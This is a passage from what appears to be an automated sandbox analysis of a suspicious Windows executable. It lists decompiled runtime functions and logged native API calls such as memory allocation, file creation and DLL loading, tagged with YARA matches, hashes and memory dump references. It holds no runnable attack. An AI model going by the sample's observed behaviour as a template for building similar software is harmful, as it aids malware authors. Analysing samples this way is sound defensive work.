                                                                    0x00402a54
                                                                    0x00402a5a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00402a5c
                                                                    0x00402a5e
                                                                    0x00000000
                                                                    0x00402a5e

                                                                    APIs
                                                                    • GetStartupInfoA.KERNEL32(?), ref: 004029D4
                                                                    • GetFileType.KERNEL32(?,?,00000000), ref: 00402A7F
                                                                    • GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00402AE2
                                                                    • GetFileType.KERNEL32(00000000,?,00000000), ref: 00402AF0
                                                                    • SetHandleCount.KERNEL32 ref: 00402B27
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleType$CountInfoStartup
                                                                    • String ID:
                                                                    • API String ID: 1710529072-0
                                                                    • Opcode ID: 2ab278c6df39cfa03bb7060241e7dce04149781c205c4e6934a59e1546028741
                                                                    • Instruction ID: 924ec46a1f264d2b59b773f44d255a2275d2ec36f82d1fb601945084d9d20eca
                                                                    • Opcode Fuzzy Hash: 2ab278c6df39cfa03bb7060241e7dce04149781c205c4e6934a59e1546028741
                                                                    • Instruction Fuzzy Hash: CA51F8316006018FD720CF28CA8C7267BE4EB11728F254A7ED996F73D1DBB89905CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402B99() {
                                                                    				void _t10;
                                                                    				long _t15;
                                                                    				void* _t16;
                                                                    
                                                                    				_t15 = GetLastError();
                                                                    				_t16 = TlsGetValue( *0x4060d4);
                                                                    				if(_t16 == 0) {
                                                                    					_t16 = E00403505(1, 0x74);
                                                                    					if(_t16 == 0 || TlsSetValue( *0x4060d4, _t16) == 0) {
                                                                    						E00402161(0x10);
                                                                    					} else {
                                                                    						E00402B86(_t16);
                                                                    						_t10 = GetCurrentThreadId();
                                                                    						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                                                                    						 *_t16 = _t10;
                                                                    					}
                                                                    				}
                                                                    				SetLastError(_t15);
                                                                    				return _t16;
                                                                    			}






                                                                    0x00402ba7
                                                                    0x00402baf
                                                                    0x00402bb3
                                                                    0x00402bbe
                                                                    0x00402bc4
                                                                    0x00402bee
                                                                    0x00402bd7
                                                                    0x00402bd8
                                                                    0x00402bde
                                                                    0x00402be4
                                                                    0x00402be8
                                                                    0x00402be8
                                                                    0x00402bc4
                                                                    0x00402bf5
                                                                    0x00402bff

                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402B9B
                                                                    • TlsGetValue.KERNEL32(?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402BA9
                                                                    • SetLastError.KERNEL32(00000000,?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402BF5
                                                                      • Part of subcall function 00403505: HeapAlloc.KERNEL32(00000008,?,?,?,?,00402B51,00000001,00000074,?,004020CA), ref: 0040355A
                                                                    • TlsSetValue.KERNEL32(00000000,?,00000000,004022D5,00000000,?,?,?,00402153,?,?,00000000,00000000), ref: 00402BCD
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00402BDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                    • String ID:
                                                                    • API String ID: 2020098873-0
                                                                    • Opcode ID: cc3e25ad3ce2f358bdf0e483270c17539a3a2f4085fff9516ff4ab5a6b048679
                                                                    • Instruction ID: 905b2bb4ec102b659b3e470b6a75c60645c1930495211033dcab0bdd225433dd
                                                                    • Opcode Fuzzy Hash: cc3e25ad3ce2f358bdf0e483270c17539a3a2f4085fff9516ff4ab5a6b048679
                                                                    • Instruction Fuzzy Hash: 44F062316016215BD6212F30AE0DA1F3F64EB01761711063AFB45B92E1CB7898019A98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00402F98(void* __eax) {
                                                                    				void* _t1;
                                                                    
                                                                    				_t1 = __eax;
                                                                    				InitializeCriticalSection( *0x4061c4);
                                                                    				InitializeCriticalSection( *0x4061b4);
                                                                    				InitializeCriticalSection( *0x4061a4);
                                                                    				InitializeCriticalSection( *0x406184);
                                                                    				return _t1;
                                                                    			}




                                                                    0x00402f98
                                                                    0x00402fa5
                                                                    0x00402fad
                                                                    0x00402fb5
                                                                    0x00402fbd
                                                                    0x00402fc0

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FA5
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FAD
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FB5
                                                                    • InitializeCriticalSection.KERNEL32(?,00402B38,?,004020CA), ref: 00402FBD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.340723744.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.340717496.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340734243.0000000000405000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.340741211.0000000000406000.00000004.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalInitializeSection
                                                                    • String ID:
                                                                    • API String ID: 32694325-0
                                                                    • Opcode ID: 4fded63293943bebae6f0f0b3973d3d43efaa6ddd02f4602d4fa5c2f060bab93
                                                                    • Instruction ID: 26236dc63c9330130dff9c07ffb8b2b085cb36797589e533e36efaee3c3c2e08
                                                                    • Opcode Fuzzy Hash: 4fded63293943bebae6f0f0b3973d3d43efaa6ddd02f4602d4fa5c2f060bab93
                                                                    • Instruction Fuzzy Hash: 59C00231815038AFCE122B65FF1A84A3FA6EB042A03060072A50A7A0368A721C30EFD8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Executed Functions

                                                                    APIs
                                                                    • NtReadFile.NTDLL(b=A,5E972F59,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F59,00413D62,?,00000000), ref: 004182C5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID: !:A$b=A$b=A
                                                                    • API String ID: 2738559852-704622139
                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction ID: 51f5fae1d88b5840d166f8ea9f31b1482cd02544441b85bb92b9de754d914906
                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                    • Instruction Fuzzy Hash: F0F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158249BA1D97241DA30E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID: 6HCU
                                                                    • API String ID: 2167126740-1255677348
                                                                    • Opcode ID: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                    • Instruction ID: 785ee6bdb1737b7ece5f68c773e4035cb9a370b06d5a2f4bb549206f88432f0d
                                                                    • Opcode Fuzzy Hash: a201d11073bd5dc7628d926a61bbc76284421643bd7734e75ee832c2f14c850b
                                                                    • Instruction Fuzzy Hash: 4DF0F8B5200208ABCB14DF99DC81EEB77A9AF8C754F158149BE5897251D630E911CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Load
                                                                    • String ID:
                                                                    • API String ID: 2234796835-0
                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction ID: 4e6e3ee69d5942d72351b9e79d7f2bfe549f68bd28f2ef5b77caac8f1f18b979
                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                    • Instruction Fuzzy Hash: BB0152B5E0010DA7DB10DAA1DC42FDEB378AB54308F0041A5E918A7281F635EB54C795
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction ID: 4ba06d0811943408d915368c3acdb1aee86cb039c5ce671b45e9a6de03e682c0
                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                    • Instruction Fuzzy Hash: EAF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00408B03,?,00413BA7,00408B03,FFFFFFFF,?,?,FFFFFFFF,00408B03,00413BA7,?,00408B03,00000060,00000000,00000000), ref: 0041821D
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                    • Instruction ID: eb2fcad7cfbb8d36c8c07e65e7b1c2717ee67fb2c70223fbf7d83cf3cf0a7d26
                                                                    • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                    • Instruction Fuzzy Hash: 62F0F8B2218148AF8B44CF9CDD94CEB77ADEB8C210B14465CFA5CC7205C635E8028B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418FA4,?,00000000,?,00003000,00000040,00000000,00000000,00408B03), ref: 004183E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID:
                                                                    • API String ID: 2167126740-0
                                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction ID: 5f1ba135279249ad747bfdca3347611d303f78695a7cb9da664d5d0d2719559c
                                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                    • Instruction Fuzzy Hash: 4EF015B2200208ABCB14DF89DC81EEB77ADAF88754F118249BE0897281C630F810CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00413D40,?,?,00413D40,00408B03,FFFFFFFF), ref: 00418325
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction ID: e0948211a995ee673693cff6b37ba25287d5fac55aefcf59dfc2265e20a22c74
                                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                    • Instruction Fuzzy Hash: EAD012752003146BD710EF99DC45ED7775CEF44750F154559BA185B282C570F90086E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 2fb3d2c1dc573ce84b81882f7ead5dd4d112b844fa127f3e519557d0e5f8cd93
                                                                    • Instruction ID: 68577cacf03e93670ad29c050c5fdd55d226c7789325752fb55606666364c01f
                                                                    • Opcode Fuzzy Hash: 2fb3d2c1dc573ce84b81882f7ead5dd4d112b844fa127f3e519557d0e5f8cd93
                                                                    • Instruction Fuzzy Hash: 1190027120108812D2106569840474A000597D1351F95C421A482479CD8BD58891B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 8115cae4f2fc3fa34757934cd833c383d81e6c58f317df686f1a61672ea427d8
                                                                    • Instruction ID: a15b8af47e4efb8ea668a3f14418aa5d9a1d2b6886b025e5208f5892d88a5080
                                                                    • Opcode Fuzzy Hash: 8115cae4f2fc3fa34757934cd833c383d81e6c58f317df686f1a61672ea427d8
                                                                    • Instruction Fuzzy Hash: F890026160100512D20175694404616000A97D1391FD1C032A1424699ECF658992F171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: ce3f4df23be8fde40d979cbdefcecede6a00ec788d2ce776c29b7cf371fa23c9
                                                                    • Instruction ID: 7c054a974e3105e83e9f5644a268685edbb76e4286ea4597864701f4beaa2fd0
                                                                    • Opcode Fuzzy Hash: ce3f4df23be8fde40d979cbdefcecede6a00ec788d2ce776c29b7cf371fa23c9
                                                                    • Instruction Fuzzy Hash: E0900261601000524240757988449064005BBE2361791C131A0D98694D8B998865A6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0acd7c6dc2370abcb92788717fcf4619d0c55782036128b0f43b8cfd6b80d032
                                                                    • Instruction ID: 0235c36ea7bdcdbc24841a5a9b88e092e6e731b5e84bb4efd8ed8fed32cf97c0
                                                                    • Opcode Fuzzy Hash: 0acd7c6dc2370abcb92788717fcf4619d0c55782036128b0f43b8cfd6b80d032
                                                                    • Instruction Fuzzy Hash: D690027120140412D2006569481470B000597D1352F91C021A1564699D8B658851B5B1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: c3fbae32eeb71227ccd9fca3cff944c3166f5b60fb68fbe90789eea645c24a0e
                                                                    • Instruction ID: f4bd54b5bf831bbc9e69f1551ac1406b83f441b015e97b511b1de3e2849c4bf0
                                                                    • Opcode Fuzzy Hash: c3fbae32eeb71227ccd9fca3cff944c3166f5b60fb68fbe90789eea645c24a0e
                                                                    • Instruction Fuzzy Hash: 0D90027120100423D21165694504707000997D1391FD1C422A082469CD9B968952F161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 6cadbd5e4272190adbfbf2af08db6f58ca292d3bf5c399c5ef898344e78f155f
                                                                    • Instruction ID: f4b46b39021c9b4c7c1a5a49f2c3a136c92a869598acb371458f492dbf23ec86
                                                                    • Opcode Fuzzy Hash: 6cadbd5e4272190adbfbf2af08db6f58ca292d3bf5c399c5ef898344e78f155f
                                                                    • Instruction Fuzzy Hash: CA90027120100812D2807569440464A000597D2351FD1C025A0425798DCF558A59B7E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 7576b971790bf13512522a234de5469697e74cb65f592d3528a3b5a0e7fe3d8c
                                                                    • Instruction ID: 1e479c74a930dbb7ea33a03ed207d21741d401c53c4c0977dc14dbd2bbe76a09
                                                                    • Opcode Fuzzy Hash: 7576b971790bf13512522a234de5469697e74cb65f592d3528a3b5a0e7fe3d8c
                                                                    • Instruction Fuzzy Hash: 72900261242041625645B56944045074006A7E13917D1C022A1814A94C8B669856E661
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 596357a39836952033d1b746f944710ed6ce02a0f1c9530f61c2b73113b3752e
                                                                    • Instruction ID: cb008b70dde0232e8d6226cbbb86638acafec2c16bb9ff353fbac24b37e8939e
                                                                    • Opcode Fuzzy Hash: 596357a39836952033d1b746f944710ed6ce02a0f1c9530f61c2b73113b3752e
                                                                    • Instruction Fuzzy Hash: 3A90026121180052D30069794C14B07000597D1353F91C125A0554698CCF558861A561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 209cc308ffe874406d7647d095db9f7a237dc110956bb9a8a98eb28d14db2233
                                                                    • Instruction ID: d832ba77576803b6286238bc09bbe404ad308535eb4c9bb62c3b66c6f020faa0
                                                                    • Opcode Fuzzy Hash: 209cc308ffe874406d7647d095db9f7a237dc110956bb9a8a98eb28d14db2233
                                                                    • Instruction Fuzzy Hash: D390026130100013D240756954186064005E7E2351F91D021E0814698CDF558856A262
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 040b4a96a6718cee8770d174008de474ea504b3adf4dde51d7060110f8ec40fa
                                                                    • Instruction ID: a7e5dc4759d1625ba41805ec83abb50d7edd9eb1735cf4a6fa62cbbdafbff437
                                                                    • Opcode Fuzzy Hash: 040b4a96a6718cee8770d174008de474ea504b3adf4dde51d7060110f8ec40fa
                                                                    • Instruction Fuzzy Hash: F89002A134100452D20065694414B060005D7E2351F91C025E1464698D8B59CC52B166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 0319febce1b238bccee2e870a966cb1e47385c5509105cba465d9ad6f2fb45e7
                                                                    • Instruction ID: 36d071a959a6f0a111c576ec08f9d029a47a7c11d6cb807275366bd40099b6e0
                                                                    • Opcode Fuzzy Hash: 0319febce1b238bccee2e870a966cb1e47385c5509105cba465d9ad6f2fb45e7
                                                                    • Instruction Fuzzy Hash: 9190026921300012D2807569540860A000597D2352FD1D425A041569CCCF558869A361
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 4717eb11b922ca763f63cfd7994985204483ec7c517878153c8c28316d199e85
                                                                    • Instruction ID: e8ef55b3b4adbd1686dd807c2cf377ff9f5483e261f33cb6f195f739ed8e862f
                                                                    • Opcode Fuzzy Hash: 4717eb11b922ca763f63cfd7994985204483ec7c517878153c8c28316d199e85
                                                                    • Instruction Fuzzy Hash: C990027131114412D21065698404706000597D2351F91C421A0C2469CD8BD58891B162
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d35692e5bdeb6eea3ffc547d5b26c18732cb8d71af201f7bd89186bc9d01a0bb
                                                                    • Instruction ID: 1ee415f62fcc7bc23197f2fae678f616f8e7c0287027dad8e4c0b17d9296dc0e
                                                                    • Opcode Fuzzy Hash: d35692e5bdeb6eea3ffc547d5b26c18732cb8d71af201f7bd89186bc9d01a0bb
                                                                    • Instruction Fuzzy Hash: 0D9002A120200013420575694414616400A97E1351B91C031E14146D4DCB658891B165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: d511b65e941810c0a256b3fb727b9dca906328f8e29a90ebad8f942ee0e696bf
                                                                    • Instruction ID: 0c98212f9dd497fe65c9511947fc41b20cfd05617b1c987f29f40259d2469902
                                                                    • Opcode Fuzzy Hash: d511b65e941810c0a256b3fb727b9dca906328f8e29a90ebad8f942ee0e696bf
                                                                    • Instruction Fuzzy Hash: 2D9002B120100412D24075694404746000597D1351F91C021A5464698E8B998DD5B6A5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 06248a724e25e8f3dcb049de536c6f6b90f5ba6462aed2669a074eaba68f80b7
                                                                    • Instruction ID: a99082bcae208ede5e477a693b704ce9cc5fb811fedd37e9e08f5394a0744ee1
                                                                    • Opcode Fuzzy Hash: 06248a724e25e8f3dcb049de536c6f6b90f5ba6462aed2669a074eaba68f80b7
                                                                    • Instruction Fuzzy Hash: 3B90027120100412D20069A95408646000597E1351F91D021A5424699ECBA58891B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, Offset: 00A30000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: a1f417d88bbf8ceab1296fea0d6ebfeb0c127f1256d65595fc8a1a235d2892f3
                                                                    • Instruction ID: 9d1491ed33fba1bba2825f2959545c9a1a3756fe485ba4a5fbc62be0d6ef70ed
                                                                    • Opcode Fuzzy Hash: a1f417d88bbf8ceab1296fea0d6ebfeb0c127f1256d65595fc8a1a235d2892f3
                                                                    • Instruction Fuzzy Hash: 2C900265211000130205A9690704507004697D63A1391C031F1415694CDB618861A161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                    • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID: &5A
                                                                    • API String ID: 1279760036-1617645808
                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                    • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MessagePostThread
                                                                    • String ID:
                                                                    • API String ID: 1836367815-0
                                                                    • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                    • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                    • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
